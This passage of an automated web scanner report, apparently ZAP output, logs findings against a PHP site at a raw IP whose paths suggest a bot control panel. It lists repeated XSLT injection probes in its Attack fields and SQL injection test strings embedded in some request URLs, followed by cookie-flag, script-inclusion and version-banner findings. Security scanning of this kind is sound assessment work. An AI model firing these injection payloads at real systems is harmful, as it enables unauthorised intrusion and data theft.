| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 482 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%25'%20%20--%20/Sound%20Effects |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 501 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 404 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Capture.PNG |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 482 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Sound%20Effects |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 300 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 496 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/error.wav |
| Method | GET |
| Parameter | Sound Effects |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 715 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?bot=DESKTOP-95IQEEV |
| Method | GET |
| Parameter | gate.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 667 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54 |
| Method | GET |
| Parameter | Bots.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 756 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54 |
| Method | GET |
| Parameter | dashboard.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 860 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54 |
| Method | GET |
| Parameter | tasks_page.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 756 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 806 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | 327qi |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 288 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects |
| Method | GET |
| Parameter | 327qi |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 490 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | 327qi |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 500 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | Sound Effects |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 480 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/error.wav |
| Method | GET |
| Parameter | Sound Effects |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 490 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | host |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 386 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | error.wav |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 496 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | host |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 788 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | host |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 743 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi |
| Method | POST |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 297 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php |
| Method | POST |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 529 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | POST |
| Parameter | tasks_page.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 531 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi |
| Method | POST |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 304 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| Instances | 45 |
| Solution |
Sanitize and analyze every user input coming from any client-side.
|
| Reference | https://www.contextis.com/blog/xslt-server-side-injection-attacks |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 91 |
| WASC Id | 23 |
| Plugin Id | 90017 |
|
Low |
Big Redirect Detected (Potential Sensitive Information Leak) |
|---|---|
| Description |
The server has responded with a redirect that seems to provide a large response. This may indicate that although the server sent a redirect it also responded with body content (which may include sensitive details, PII, etc.).
|
| URL | http://142.202.242.172/xampp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 194 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 234 bytes. | |
| Response Body - size: 342 bytes. | |
| Instances | 1 |
| Solution |
Ensure that no sensitive information is leaked via redirect responses. Redirect responses should have almost no content.
|
| Reference | |
| Tags |
OWASP_2021_A04
WSTG-v42-INFO-05 OWASP_2017_A03 |
| CWE Id | 201 |
| WASC Id | 13 |
| Plugin Id | 10044 |
|
Low |
Cookie No HttpOnly Flag |
|---|---|
| Description |
A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 175 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 379 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 197 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 393 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 209 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 808 bytes. | |
| Request Body - size: 113 bytes. | |
| Response Header - size: 513 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 7 |
| Solution |
Ensure that the HttpOnly flag is set for all cookies.
|
| Reference | https://owasp.org/www-community/HttpOnly |
| Tags |
OWASP_2021_A05
WSTG-v42-SESS-02 OWASP_2017_A06 |
| CWE Id | 1004 |
| WASC Id | 13 |
| Plugin Id | 10010 |
|
Low |
Cookie without SameSite Attribute |
|---|---|
| Description |
A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective counter measure to cross-site request forgery, cross-site script inclusion, and timing attacks.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 175 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 379 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 197 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 393 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 209 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 808 bytes. | |
| Request Body - size: 113 bytes. | |
| Response Header - size: 513 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 7 |
| Solution |
Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
|
| Reference | https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site |
| Tags |
OWASP_2021_A01
WSTG-v42-SESS-02 OWASP_2017_A05 |
| CWE Id | 1275 |
| WASC Id | 13 |
| Plugin Id | 10054 |
|
Low |
Cross-Domain JavaScript Source File Inclusion |
|---|---|
| Description |
The page includes one or more script files from a third-party domain.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | https://cdn.jsdelivr.net/npm/chart.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://code.jquery.com/jquery-3.5.1.slim.min.js |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://code.jquery.com/jquery-3.5.1.slim.min.js |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | https://code.jquery.com/jquery-3.5.1.slim.min.js |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 85 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | https://code.jquery.com/jquery-3.5.1.slim.min.js |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 85 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 85 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| Instances | 13 |
| Solution |
Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.
|
| Reference | |
| Tags | OWASP_2021_A08 |
| CWE Id | 829 |
| WASC Id | 15 |
| Plugin Id | 10017 |
|
Low |
In Page Banner Information Leak |
|---|---|
| Description |
The server returned a version banner string in the response content. Such information leaks may allow attackers to further target specific issues impacting the product and version in use.
|
| URL | http://142.202.242.172/robots.txt |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 159 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 160 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 165 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 626 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 241 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Apache/2.4.58 |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 304 bytes. | |
| Instances | 5 |
| Solution |
Configure the server to prevent such information leaks. For example:
Under Tomcat this is done via the "server" directive and implementation of custom error pages.
Under Apache this is done via the "ServerSignature" and "ServerTokens" directives.
|
| Reference | https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/ |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 WSTG-v42-INFO-02 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 10009 |
|
Low |
Insufficient Site Isolation Against Spectre Vulnerability |
|---|---|
| Description |
Cross-Origin-Resource-Policy header is an opt-in header designed to counter side-channels attacks like Spectre. Resource should be specifically set as shareable amongst different origins.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | Cross-Origin-Resource-Policy |
| Attack | |
| Evidence | |
| Request Header - size: 574 bytes. | |
| Request Body - size: 0 bytes. | |
